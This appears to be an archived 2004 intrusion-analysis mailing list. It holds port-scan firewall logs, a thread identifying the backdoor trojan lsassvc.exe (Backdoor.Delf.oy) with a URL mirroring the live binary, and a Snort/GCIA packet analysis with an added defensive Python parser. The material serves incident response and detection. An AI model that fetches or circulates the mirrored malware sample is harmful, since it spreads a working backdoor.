Jul 9 06:56:28 212.145.209.19:4628 -> xxx.yyy.194.124:1023 SYN ******S*
Jul 9 06:56:29 212.145.209.19:4698 -> xxx.yyy.194.124:9898 SYN ******S*
Jul 9 06:56:27 212.145.209.19:4311 -> xxx.yyy.194.125:5554 SYN ******S*
Jul 9 06:56:28 212.145.209.19:4633 -> xxx.yyy.194.125:1023 SYN ******S*
Jul 9 06:56:29 212.145.209.19:4700 -> xxx.yyy.194.125:9898 SYN ******S*
Jul 9 06:56:27 212.145.209.19:4324 -> xxx.yyy.194.126:5554 SYN ******S*
Jul 9 06:56:28 212.145.209.19:4636 -> xxx.yyy.194.126:1023 SYN ******S*
[...]
Jul 9 06:58:08 212.145.209.19:2150 -> xxx.yyy.196.58:5554 SYN ******S*
Jul 9 06:58:08 212.145.209.19:2637 -> xxx.yyy.196.58:1023 SYN ******S*
Jul 9 06:58:09 212.145.209.19:1630 -> xxx.yyy.196.58:9898 SYN ******S*
Jul 9 06:58:08 212.145.209.19:2163 -> xxx.yyy.196.60:5554 SYN ******S*
Jul 9 06:58:09 212.145.209.19:2649 -> xxx.yyy.196.60:1023 SYN ******S*
Jul 9 06:58:09 212.145.209.19:1640 -> xxx.yyy.196.60:9898 SYN ******S*
Jul 9 06:58:08 212.145.209.19:2170 -> xxx.yyy.196.61:5554 SYN ******S*
Jul 9 06:58:09 212.145.209.19:2683 -> xxx.yyy.196.61:1023 SYN ******S*
Jul 9 06:58:09 212.145.209.19:2399 -> xxx.yyy.196.61:9898 SYN ******S*
11373

Jul 9 10:04:49 202.61.212.40:3054 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 9 10:04:51 202.61.212.40:1394 -> xxx.yyy.1.15:1433 SYN ******S*
Jul 9 10:04:51 202.61.212.40:4216 -> xxx.yyy.1.16:1433 SYN ******S*
Jul 9 10:04:51 202.61.212.40:3417 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 9 10:04:51 202.61.212.40:4653 -> xxx.yyy.1.11:1433 SYN ******S*
Jul 9 10:04:51 202.61.212.40:2583 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 9 10:04:52 202.61.212.40:4580 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 9 10:04:49 202.61.212.40:1777 -> xxx.yyy.1.7:1433 SYN ******S*
[...]
Jul 9 11:51:30 202.61.212.40:3710 -> xxx.yyy.111.255:1433 SYN ******S*
Jul 9 11:51:30 202.61.212.40:2218 -> xxx.yyy.111.244:1433 SYN ******S*
Jul 9 11:51:31 202.61.212.40:2530 -> xxx.yyy.111.245:1433 SYN ******S*
Jul 9 11:51:31 202.61.212.40:2645 -> xxx.yyy.111.246:1433 SYN ******S*
Jul 9 11:51:31 202.61.212.40:2760 -> xxx.yyy.111.247:1433 SYN ******S*
Jul 9 11:51:31 202.61.212.40:2959 -> xxx.yyy.111.249:1433 SYN ******S*
Jul 9 11:51:32 202.61.212.40:3095 -> xxx.yyy.111.250:1433 SYN ******S*
Jul 9 11:51:32 202.61.212.40:3190 -> xxx.yyy.111.251:1433 SYN ******S*
Jul 9 11:51:32 202.61.212.40:3321 -> xxx.yyy.111.252:1433 SYN ******S*
9934

Jul 9 00:56:23 61.149.177.106:3403 -> xxx.yyy.214.246:5554 SYN ******S*
Jul 9 00:56:24 61.149.177.106:4134 -> xxx.yyy.214.246:1023 SYN ******S*
Jul 9 00:56:23 61.149.177.106:3419 -> xxx.yyy.214.250:5554 SYN ******S*
Jul 9 00:56:24 61.149.177.106:4147 -> xxx.yyy.214.250:1023 SYN ******S*
Jul 9 00:56:23 61.149.177.106:3420 -> xxx.yyy.214.251:5554 SYN ******S*
Jul 9 00:56:24 61.149.177.106:4148 -> xxx.yyy.214.251:1023 SYN ******S*
Jul 9 00:56:26 61.149.177.106:1797 -> xxx.yyy.214.251:9898 SYN ******S*
Jul 9 00:56:23 61.149.177.106:3480 -> xxx.yyy.214.253:5554 SYN ******S*
[...]
Jul 9 00:57:12 61.149.177.106:2418 -> xxx.yyy.235.90:9898 SYN ******S*
Jul 9 00:57:12 61.149.177.106:2342 -> xxx.yyy.235.67:9898 SYN ******S*
Jul 9 00:57:12 61.149.177.106:2433 -> xxx.yyy.235.86:9898 SYN ******S*
Jul 9 00:57:12 61.149.177.106:2471 -> xxx.yyy.235.74:9898 SYN ******S*
Jul 9 00:57:12 61.149.177.106:2515 -> xxx.yyy.235.105:9898 SYN ******S*
Jul 9 00:57:12 61.149.177.106:2558 -> xxx.yyy.235.103:9898 SYN ******S*
Jul 9 00:57:12 61.149.177.106:2570 -> xxx.yyy.235.112:9898 SYN ******S*
Jul 9 00:57:12 61.149.177.106:2566 -> xxx.yyy.235.108:9898 SYN ******S*
9810

Jul 9 17:14:20 221.185.83.34:3526 -> xxx.yyy.1.1:139 SYN ******S*
Jul 9 17:14:20 221.185.83.34:3534 -> xxx.yyy.1.2:139 SYN ******S*
Jul 9 17:14:20 221.185.83.34:3545 -> xxx.yyy.1.3:139 SYN ******S*
Jul 9 17:14:20 221.185.83.34:3560 -> xxx.yyy.1.4:139 SYN ******S*
Jul 9 17:14:20 221.185.83.34:3575 -> xxx.yyy.1.5:139 SYN ******S*
Jul 9 17:14:20 221.185.83.34:3577 -> xxx.yyy.1.6:139 SYN ******S*
Jul 9 17:14:20 221.185.83.34:3587 -> xxx.yyy.1.7:139 SYN ******S*
Jul 9 17:14:20 221.185.83.34:3593 -> xxx.yyy.1.8:139 SYN ******S*
[...]
Jul 9 17:43:13 221.185.83.34:4789 -> xxx.yyy.32.248:139 SYN ******S*
Jul 9 17:43:13 221.185.83.34:4781 -> xxx.yyy.32.247:139 SYN ******S*
Jul 9 17:43:13 221.185.83.34:4802 -> xxx.yyy.32.250:139 SYN ******S*
Jul 9 17:43:13 221.185.83.34:4819 -> xxx.yyy.32.251:139 SYN ******S*
Jul 9 17:43:13 221.185.83.34:4796 -> xxx.yyy.32.249:139 SYN ******S*
Jul 9 17:43:13 221.185.83.34:4827 -> xxx.yyy.32.254:139 SYN ******S*
Jul 9 17:43:13 221.185.83.34:4828 -> xxx.yyy.32.255:139 SYN ******S*
Jul 9 17:43:13 221.185.83.34:4823 -> xxx.yyy.32.252:139 SYN ******S*
Jul 9 17:43:13 221.185.83.34:4824 -> xxx.yyy.32.253:139 SYN ******S*
8240

Jul 9 00:56:16 221.4.72.43:3063 -> xxx.yyy.10.50:5554 SYN ******S*
Jul 9 00:56:17 221.4.72.43:3360 -> xxx.yyy.10.50:1023 SYN ******S*
Jul 9 00:56:19 221.4.72.43:3955 -> xxx.yyy.10.50:9898 SYN ******S*
Jul 9 00:56:16 221.4.72.43:3064 -> xxx.yyy.10.51:5554 SYN ******S*
Jul 9 00:56:17 221.4.72.43:3385 -> xxx.yyy.10.51:1023 SYN ******S*
Jul 9 00:56:16 221.4.72.43:3066 -> xxx.yyy.10.53:5554 SYN ******S*
Jul 9 00:56:17 221.4.72.43:3390 -> xxx.yyy.10.53:1023 SYN ******S*
Jul 9 00:56:16 221.4.72.43:3067 -> xxx.yyy.10.54:5554 SYN ******S*
[...]
Jul 9 00:58:25 221.4.72.43:2293 -> xxx.yyy.29.248:9898 SYN ******S*
Jul 9 00:58:25 221.4.72.43:2299 -> xxx.yyy.29.249:9898 SYN ******S*
Jul 9 00:58:25 221.4.72.43:2303 -> xxx.yyy.29.251:9898 SYN ******S*
Jul 9 00:58:25 221.4.72.43:2302 -> xxx.yyy.29.250:9898 SYN ******S*
Jul 9 00:58:25 221.4.72.43:2306 -> xxx.yyy.29.252:9898 SYN ******S*
Jul 9 00:58:25 221.4.72.43:2314 -> xxx.yyy.29.253:9898 SYN ******S*
Jul 9 00:58:25 221.4.72.43:2315 -> xxx.yyy.29.254:9898 SYN ******S*
Jul 9 00:58:25 221.4.72.43:2318 -> xxx.yyy.29.255:9898 SYN ******S*
6176

Jul 9 00:56:19 218.61.200.177:1646 -> xxx.yyy.64.0:5554 SYN ******S*
Jul 9 00:56:20 218.61.200.177:2212 -> xxx.yyy.64.0:1023 SYN ******S*
Jul 9 00:56:22 218.61.200.177:3189 -> xxx.yyy.64.0:9898 SYN ******S*
Jul 9 00:56:19 218.61.200.177:1648 -> xxx.yyy.64.1:5554 SYN ******S*
Jul 9 00:56:20 218.61.200.177:2215 -> xxx.yyy.64.1:1023 SYN ******S*
Jul 9 00:56:22 218.61.200.177:3190 -> xxx.yyy.64.1:9898 SYN ******S*
Jul 9 00:56:19 218.61.200.177:1653 -> xxx.yyy.64.2:5554 SYN ******S*
Jul 9 00:56:20 218.61.200.177:2231 -> xxx.yyy.64.2:1023 SYN ******S*
[...]
Jul 9 00:56:38 218.61.200.177:3697 -> xxx.yyy.71.58:9898 SYN ******S*
Jul 9 00:56:38 218.61.200.177:3698 -> xxx.yyy.71.59:9898 SYN ******S*
Jul 9 00:56:38 218.61.200.177:3699 -> xxx.yyy.71.60:9898 SYN ******S*
Jul 9 00:56:38 218.61.200.177:3703 -> xxx.yyy.71.52:9898 SYN ******S*
Jul 9 00:56:38 218.61.200.177:3758 -> xxx.yyy.71.75:9898 SYN ******S*
Jul 9 00:56:38 218.61.200.177:3759 -> xxx.yyy.71.72:9898 SYN ******S*
Jul 9 00:56:38 218.61.200.177:3820 -> xxx.yyy.71.83:9898 SYN ******S*
Jul 9 00:56:38 218.61.200.177:4136 -> xxx.yyy.71.127:9898 SYN ******S*
Jul 9 00:56:38 218.61.200.177:4146 -> xxx.yyy.71.130:9898 SYN ******S*
4762

Jul 9 00:55:56 218.109.24.87:4363 -> xxx.yyy.154.100:9898 SYN ******S*
Jul 9 00:55:56 218.109.24.87:4364 -> xxx.yyy.154.101:9898 SYN ******S*
Jul 9 00:55:56 218.109.24.87:4377 -> xxx.yyy.154.106:9898 SYN ******S*
Jul 9 00:55:56 218.109.24.87:4434 -> xxx.yyy.154.103:9898 SYN ******S*
Jul 9 00:55:56 218.109.24.87:4435 -> xxx.yyy.154.104:9898 SYN ******S*
Jul 9 00:55:56 218.109.24.87:4436 -> xxx.yyy.154.105:9898 SYN ******S*
Jul 9 00:55:56 218.109.24.87:4457 -> xxx.yyy.154.102:9898 SYN ******S*
Jul 9 00:55:57 218.109.24.87:4481 -> xxx.yyy.154.107:9898 SYN ******S*
[...]
Jul 9 00:57:07 218.109.24.87:4536 -> xxx.yyy.174.219:9898 SYN ******S*
Jul 9 00:57:07 218.109.24.87:4537 -> xxx.yyy.174.208:9898 SYN ******S*
Jul 9 00:57:07 218.109.24.87:4540 -> xxx.yyy.174.211:9898 SYN ******S*
Jul 9 00:57:07 218.109.24.87:4541 -> xxx.yyy.174.212:9898 SYN ******S*
Jul 9 00:57:07 218.109.24.87:4539 -> xxx.yyy.174.210:9898 SYN ******S*
Jul 9 00:57:07 218.109.24.87:4553 -> xxx.yyy.174.214:9898 SYN ******S*
Jul 9 00:57:07 218.109.24.87:4542 -> xxx.yyy.174.213:9898 SYN ******S*
Jul 9 00:57:07 218.109.24.87:4556 -> xxx.yyy.174.216:9898 SYN ******S*
Jul 9 00:57:07 218.109.24.87:4554 -> xxx.yyy.174.215:9898 SYN ******S*
4409

Jul 9 00:56:31 218.24.68.146:2409 -> xxx.yyy.10.164:5554 SYN ******S*
Jul 9 00:56:32 218.24.68.146:3170 -> xxx.yyy.10.164:1023 SYN ******S*
Jul 9 00:56:34 218.24.68.146:1035 -> xxx.yyy.10.164:9898 SYN ******S*
Jul 9 00:56:31 218.24.68.146:2408 -> xxx.yyy.10.163:5554 SYN ******S*
Jul 9 00:56:32 218.24.68.146:3169 -> xxx.yyy.10.163:1023 SYN ******S*
Jul 9 00:56:34 218.24.68.146:1034 -> xxx.yyy.10.163:9898 SYN ******S*
Jul 9 00:56:31 218.24.68.146:2411 -> xxx.yyy.10.166:5554 SYN ******S*
Jul 9 00:56:32 218.24.68.146:3172 -> xxx.yyy.10.166:1023 SYN ******S*
[...]
Jul 9 00:57:17 218.24.68.146:2237 -> xxx.yyy.11.234:9898 SYN ******S*
Jul 9 00:57:17 218.24.68.146:2239 -> xxx.yyy.11.236:9898 SYN ******S*
Jul 9 00:57:17 218.24.68.146:2241 -> xxx.yyy.11.238:9898 SYN ******S*
Jul 9 00:57:17 218.24.68.146:2242 -> xxx.yyy.11.239:9898 SYN ******S*
Jul 9 00:57:17 218.24.68.146:2240 -> xxx.yyy.11.237:9898 SYN ******S*
Jul 9 00:57:17 218.24.68.146:2244 -> xxx.yyy.11.241:9898 SYN ******S*
Jul 9 00:57:17 218.24.68.146:2243 -> xxx.yyy.11.240:9898 SYN ******S*
Jul 9 00:57:17 218.24.68.146:2245 -> xxx.yyy.11.242:9898 SYN ******S*
4026

Jul 9 00:32:20 61.170.155.136:3900 -> xxx.yyy.154.100:1023 SYN ******S*
Jul 9 00:32:20 61.170.155.136:3910 -> xxx.yyy.154.103:1023 SYN ******S*
Jul 9 00:32:22 61.170.155.136:1444 -> xxx.yyy.154.103:9898 SYN ******S*
Jul 9 00:32:20 61.170.155.136:3914 -> xxx.yyy.154.111:1023 SYN ******S*
Jul 9 00:32:20 61.170.155.136:3915 -> xxx.yyy.154.114:1023 SYN ******S*
Jul 9 00:32:20 61.170.155.136:3920 -> xxx.yyy.154.129:1023 SYN ******S*
Jul 9 00:32:22 61.170.155.136:1455 -> xxx.yyy.154.129:9898 SYN ******S*
Jul 9 00:32:20 61.170.155.136:3927 -> xxx.yyy.154.135:1023 SYN ******S*
[...]
Jul 9 00:33:01 61.170.155.136:2266 -> xxx.yyy.174.213:9898 SYN ******S*
Jul 9 00:33:01 61.170.155.136:2275 -> xxx.yyy.174.217:9898 SYN ******S*
Jul 9 00:33:01 61.170.155.136:2278 -> xxx.yyy.174.219:9898 SYN ******S*
Jul 9 00:33:01 61.170.155.136:2281 -> xxx.yyy.174.220:9898 SYN ******S*
Jul 9 00:33:01 61.170.155.136:2282 -> xxx.yyy.174.222:9898 SYN ******S*
Jul 9 00:33:01 61.170.155.136:2285 -> xxx.yyy.174.221:9898 SYN ******S*
Jul 9 00:33:01 61.170.155.136:2288 -> xxx.yyy.154.123:9898 SYN ******S*
Jul 9 00:33:01 61.170.155.136:2291 -> xxx.yyy.154.127:9898 SYN ******S*
3699

Jul 9 00:56:46 218.108.181.144:1927 -> xxx.yyy.174.222:9898 SYN ******S*
Jul 9 00:56:46 218.108.181.144:1928 -> xxx.yyy.174.223:9898 SYN ******S*
Jul 9 00:56:46 218.108.181.144:1929 -> xxx.yyy.174.224:9898 SYN ******S*
Jul 9 00:56:46 218.108.181.144:1930 -> xxx.yyy.174.225:9898 SYN ******S*
Jul 9 00:56:46 218.108.181.144:1931 -> xxx.yyy.174.226:9898 SYN ******S*
Jul 9 00:56:46 218.108.181.144:1932 -> xxx.yyy.174.227:9898 SYN ******S*
Jul 9 00:56:46 218.108.181.144:1933 -> xxx.yyy.174.228:9898 SYN ******S*
Jul 9 00:56:46 218.108.181.144:1934 -> xxx.yyy.174.229:9898 SYN ******S*
[...]
Jul 9 00:57:26 218.108.181.144:1977 -> xxx.yyy.195.79:9898 SYN ******S*
Jul 9 00:57:26 218.108.181.144:1979 -> xxx.yyy.195.81:9898 SYN ******S*
Jul 9 00:57:26 218.108.181.144:1980 -> xxx.yyy.195.82:9898 SYN ******S*
Jul 9 00:57:26 218.108.181.144:1981 -> xxx.yyy.195.83:9898 SYN ******S*
Jul 9 00:57:26 218.108.181.144:1982 -> xxx.yyy.195.84:9898 SYN ******S*
Jul 9 00:57:26 218.108.181.144:1983 -> xxx.yyy.195.85:9898 SYN ******S*
Jul 9 00:57:26 218.108.181.144:1984 -> xxx.yyy.195.86:9898 SYN ******S*
Jul 9 00:57:26 218.108.181.144:1985 -> xxx.yyy.195.87:9898 SYN ******S*
Jul 9 00:57:26 218.108.181.144:1986 -> xxx.yyy.195.88:9898 SYN ******S*
3435

--
- Ken
===========================================================================
Ken Connelly (KC152)
Systems and Operations Manager, ITS - Network Services
University of Northern Iowa
Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu
phone: (319) 273-5850
fax: (319) 273-7373

From techno.kid at gmx.de Sat Jul 10 17:59:22 2004
From: techno.kid at gmx.de (techno.kid at gmx.de)
Date: Sat, 10 Jul 2004 19:59:22 +0200
Subject: [Intrusions] Need help to identify a trojan
In-Reply-To: <200407101448.i6AEmK529891@dshield.com>
Message-ID: <40F04A9A.13720.1496DC@localhost>

> Date: Fri, 9 Jul 2004 09:34:50 -0400
> From: "Maxime Ducharme"
> Subject: [Intrusions] Need help to identify a trojan

> Hi to the list,
> one of our customer's servers has been compromised and I'd
> need help to identify the trojan used.
I did a short lookup at www.virustotal.com and "they" know it:

Virus Total
_______________________________________________
Scan results
File: lsassvc.exe
Date: 07/10/2004 19:42:07
----
BitDefender 7.0/20040710 found nothing
ClamWin devel-20040517/20040708 found nothing
eTrustAV-Inoc 4641/20040708 found nothing
F-Prot 3.15/20040708 found nothing
Kaspersky 3.0/20040710 found [Backdoor.Delf.oy]
McAfee 4375/20040709 found nothing
NOD32v2 1.807/20040710 found nothing
Norman 5.70.10/20040709 found nothing
Panda 7.02.00/20040710 found nothing
Sybari 7.5.1314/20040710 found [Backdoor.Delf.oy]
Symantec 8.0/20040709 found nothing
TrendMicro 7.000/20040709 found nothing

So that you know what the trojan is called; you should figure out how it was possible that it got onto the IIS...

techno.kid

From tliston at premmag.com Sat Jul 10 18:01:37 2004
From: tliston at premmag.com (Tom Liston)
Date: Sat, 10 Jul 2004 13:01:37 -0500
Subject: [Intrusions] Need help to identify a trojan
In-Reply-To: <020e01c465b9$8268d500$a900a8c0@cybergeneration.com>
Message-ID: <40EFE8B1.15761.12A3E67@localhost>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Maxime-

The lsassvc.exe file is identified by Kaspersky as Backdoor.Delf.oy

While I wasn't able to find any information on this particular variant, here are some links to information on the Backdoor.Delf strain.

http://securityresponse.symantec.com/avcenter/venc/data/backdoor.delf.html
http://www.pestpatrol.com/pestinfo/b/backdoor_delf.asp
http://vil.nai.com/vil/content/v_99535.htm

- -TL
SANS Internet Storm Center Malware Analysis Team

On 9 Jul 2004 at 9:34, Maxime Ducharme wrote:

- ---- >8 ---- Snip!

> The lsassvc.exe is still on angelfire's web server, and I mirrored it
> here :
> http://www.cybergeneration.com/security/2004.07.08/lsassvc.ex_
>
> This file is bound to TCP port 753, and a connection on this
> port outputs this :
> 220 jsdaus Microsoft FTP Service (Version 5.0)
>
> Looks like a "special" FTP service.
> The program answers my "USER"
> and "PASS" commands :
>
> > USER test
> < 331 Password required for test.
> > PASS test
> < 530 Login incorrect.
>
> It is also bound on a service named "Local Security Authority Service
> System".
>
> Norton says this file is not infected, but it looks really suspicious; we
> already shut down the server for analysis. It has been used for scanning.
>
> Other hack tools have been found under C:\RECYCLER\speedy.
>
> I'd like to know which kind of trojan it is, and if it has self-propagating
> behavior like some Ago-Gaobot.

-----BEGIN PGP SIGNATURE-----
Version: idw's PGP-Frontend 4.9.6.4 / 6-2004 + PGP 8.1.0
Comment: http://www.hackbusters.net/pgp.txt (FCEB5E7400758B031E4A2948)

iQA/AwUBQPAvB6Oq/X4cwCZKEQL+3wCfdiY9Sb1sOhul/qAxVMeS2QMkFh4An2Cu
lCvkmiMh39xwMyBchgJ5U62K
=w8JN
-----END PGP SIGNATURE-----

From vilaiporn_taweelappontong at yahoo.com Sun Jul 11 02:30:50 2004
From: vilaiporn_taweelappontong at yahoo.com (Vilaiporn Taweelappontong)
Date: Sat, 10 Jul 2004 19:30:50 -0700 (PDT)
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect Vilaiporn Taweelappontong
Message-ID: <20040711023050.52515.qmail@web51807.mail.yahoo.com>

Dear all

This is a second attempt to post the assignment. I would really appreciate it if someone could give me comments on my analysis.

Thank you very much in advance and regards,
Vilaiporn

1. Source of trace

The source of the trace was file 2003.12.15.6, downloaded from www.incidents.org/log.

Statistics (from Ethereal)
File length: 3000044
Format: libpcap
Start time: 2:07:16.936242
End time: 2:08:17.518422
Elapsed time between first and last packet: 60.582 seconds
Packet count: 36672
Snapshot length: 96

I used the Statistics function of Ethereal to summarize the list of IP addresses and MAC addresses in the file, and I looked up the Ethernet MAC address vendors on the web site http://www.coffer.com/mac_find/.
Below is the architecture based on my understanding:

10.10.10.165 (00:03:47:8c:89:c2 Intel machine) ---> 3COM (00:01:02:79:91:ed) ---> Sniffer ----> Firewall ---> 192.168.17.68 (00:50:56:40:00:6D VMWARE)

Observation: The file date and the timestamps reported are different. The file name indicates that the data should be from 2003/12/15, but the date specified in all packets actually indicates packets generated on 2003/11/19. I understand that some technique was used to obfuscate the information, such as modifying IP addresses, as the checksums of all packets are correct. Or no obfuscation has been done.

2. Detect was generated by

The file is stored in tcpdump binary format. The detect presented in this assignment was generated by Snort version 2.1.1, which I ran on my Windows 2000 Server machine. I ran snort in NIDS mode with the standard snort ruleset downloaded on 2 May 2004. All rules files were enabled.

Command that was used:

C:\snort\bin\snort -r 2003.12.15.6 -c c:\snort\etc\snort.conf -l ex1 -X -d -A full

-r 2003.12.15.6              read source file 2003.12.15.6
-c c:\snort\etc\snort.conf   run against the configuration file snort.conf
-l ex1                       log the output (alert file and log file) in the ex1 folder
-X                           dump the raw packet data starting at the link layer (in this case, the Ethernet header)
-d                           dump the application layer (dump the packet payloads with the packet headers)
-A full                      display text alerts with full packet headers

The selected alert result is as follows:

[**] (http_inspect) BARE BYTE UNICODE ENCODING [**]
11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80
TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF
***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20

The snort rule that triggered the "Bare Byte Unicode Encoding" alert was the http_inspect in the preprocessor configuration. [1] Preprocessors take the decoded packets from the Snort packet decoder and can examine or manipulate them before they are handed to the detection engine.
preprocessor stream4_reassemble
preprocessor http_inspect: global \
    iis_unicode_map unicode.map 1252
preprocessor http_inspect_server: server default \
    profile all ports { 80 8080 8180 } \
    oversize_dir_length 500

Note that "profile all" includes "bare byte decoding" enabled. The following configuration was displayed when I ran snort (without the quiet option enabled). You can see that the bare byte option was set to YES.

HttpInspect Config:
  GLOBAL CONFIG
    Max Pipeline Requests: 0
    Inspection Type: STATELESS
    Detect Proxy Usage: NO
    IIS Unicode Map Filename: c:\snort\etc\unicode.map
    IIS Unicode Map Codepage: 1252
  DEFAULT SERVER CONFIG:
    Ports: 80 8080 8180
    Flow Depth: 300
    Max Chunk Length: 500000
    Inspect Pipeline Requests: YES
    URI Discovery Strict Mode: NO
    Allow Proxy Usage: NO
    Disable Alerting: YES
    Oversize Dir Length: 500
    Only inspect URI: NO
    Ascii: YES alert: NO
    Double Decoding: YES alert: YES
    %U Encoding: YES alert: YES
    Bare Byte: YES alert: YES
    Base36: OFF
    UTF 8: OFF
    IIS Unicode: YES alert: YES
    Multiple Slash: YES alert: NO
    IIS Backslash: YES alert: NO
    Directory: YES alert: NO
    Apache WhiteSpace: YES alert: YES
    IIS Delimiter: YES alert: YES
    IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG
    Non-RFC Compliant Characters: NONE

To look into the packet in detail, I used windump to print the packet in hex format:

C:\windump>windump -r 2003.12.15.6 -x -vv -n "dst host 192.168.17.68 and port 80"

02:08:04.823979 IP (tos 0x0, ttl 128, id 42592, len 41) 10.10.10.165.1085 > 192.168.17.68.80: . [tcp sum ok] 3841034003:3841034004(1) ack 380024539 win 17520 (DF)
4500 0029 a660 4000 8006 6dd3 0a0a 0aa5
c0a8 1144 043d 0050 e4f1 8713 16a6 b6db
5010 4470 b6b3 0000 9000 0000 0000

It's obvious that host 192.168.17.68 is a web server and that it's IIS. The data field displayed in hex above is "90" (a NOP byte, usually used by shellcode), which looks like someone is trying a buffer overflow on the web server. Let's also look at other packets associated with host 192.168.17.68 for a better analysis.
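The single 0x90 payload byte in the hex dump above is exactly the kind of byte the http_inspect bare-byte check reacts to: a byte of 0x80 or higher that is not %-encoded. The Python below is an added example (editor's code, not part of the practical above): it pulls the TCP payload out of the windump hex dump quoted above, then classifies request bytes the way a strict RFC decoder would, so you can see why the packet alerts. The two HTTP request lines are constructed sample input; the hex dump is the one from the post.

```python
"""Extract the TCP payload from a windump/tcpdump -x hex dump and classify
its bytes the way Snort's http_inspect "bare byte" check does.
Added example, not code from the original post."""

# Hex dump of the alerting packet as printed by "windump -x": IP header
# first (Ethernet header already stripped), trailing zeros are frame padding.
WINDUMP_HEX = """
4500 0029 a660 4000 8006 6dd3 0a0a 0aa5
c0a8 1144 043d 0050 e4f1 8713 16a6 b6db
5010 4470 b6b3 0000 9000 0000 0000
"""

# Constructed sample requests (not from the post): the same path once
# percent-encoded (RFC compliant) and once with the raw UTF-8 bytes of "é".
ENCODED_REQUEST = b"GET /caf%C3%A9.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n"
BARE_REQUEST = b"GET /caf\xc3\xa9.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n"


def hexdump_to_bytes(dump: str) -> bytes:
    """Join the 4-hex-digit groups of a tcpdump -x dump into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def tcp_payload(raw: bytes) -> dict:
    """Walk the IPv4 and TCP headers; return the payload plus the fields
    needed to check the result against the Snort alert by hand."""
    ihl = (raw[0] & 0x0F) * 4                    # IP header length in bytes
    total_len = int.from_bytes(raw[2:4], "big")  # IP total length drops frame padding
    if raw[9] != 6:
        raise ValueError("not a TCP packet")
    tcp = raw[ihl:total_len]
    data_off = (tcp[12] >> 4) * 4                # TCP header length in bytes
    flags = tcp[13]
    return {
        "src_port": int.from_bytes(tcp[0:2], "big"),
        "dst_port": int.from_bytes(tcp[2:4], "big"),
        "ack_only": flags == 0x10,               # ACK set, no SYN/PSH/FIN
        "payload": tcp[data_off:],
    }


def classify_http_bytes(payload: bytes) -> dict:
    """Count how a strict decoder sees each byte of an HTTP request: plain
    ASCII, a %XX escape, or a bare byte >= 0x80 that only an IIS-style
    decoder would accept (the http_inspect "bare byte" condition)."""
    counts = {"ascii": 0, "percent_encoded": 0, "bare": 0}
    i = 0
    while i < len(payload):
        b = payload[i]
        if b == 0x25 and i + 2 < len(payload):   # '%' followed by two hex digits
            try:
                int(payload[i + 1:i + 3].decode("ascii"), 16)
                counts["percent_encoded"] += 1
                i += 3
                continue
            except (ValueError, UnicodeDecodeError):
                pass                              # a lone '%' is just ASCII
        if b >= 0x80:
            counts["bare"] += 1
        else:
            counts["ascii"] += 1
        i += 1
    return counts


def would_trip_bare_byte(payload: bytes) -> bool:
    return classify_http_bytes(payload)["bare"] > 0


def analyze_alert_packet() -> dict:
    """The packet from the post: its only payload byte is 0x90, which is
    >= 0x80 and therefore a bare byte as far as http_inspect is concerned."""
    info = tcp_payload(hexdump_to_bytes(WINDUMP_HEX))
    info["classes"] = classify_http_bytes(info["payload"])
    info["bare_byte_alert"] = would_trip_bare_byte(info["payload"])
    return info


if __name__ == "__main__":
    info = analyze_alert_packet()
    print("%d -> %d ack_only=%s payload=%s alert=%s" % (
        info["src_port"], info["dst_port"], info["ack_only"],
        info["payload"].hex(), info["bare_byte_alert"]))
    for name, req in (("encoded", ENCODED_REQUEST), ("bare", BARE_REQUEST)):
        print(name, classify_http_bytes(req),
              "alert" if would_trip_bare_byte(req) else "clean")
```

Note that the classifier only tells you the byte would be flagged; like the preprocessor, it cannot tell a NOP sled from a mis-encoded file name, which is why the analysis above goes on to look at the surrounding packets.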
C:\Snort\log\old>snort -r 2003.12.15.6 -v -q "host 192.168.17.68"

11/19-02:07:48.841453 10.10.10.165:1691 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:41554 IpLen:20 DgmLen:48 DF
******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:07:51.828714 10.10.10.165:1691 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:41720 IpLen:20 DgmLen:48 DF
******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:07:57.968183 10.10.10.165:1691 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42089 IpLen:20 DgmLen:48 DF
******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:07:59.094302 10.10.10.165:1703 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42248 IpLen:20 DgmLen:48 DF
******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:02.163499 10.10.10.165:1703 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42416 IpLen:20 DgmLen:48 DF
******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
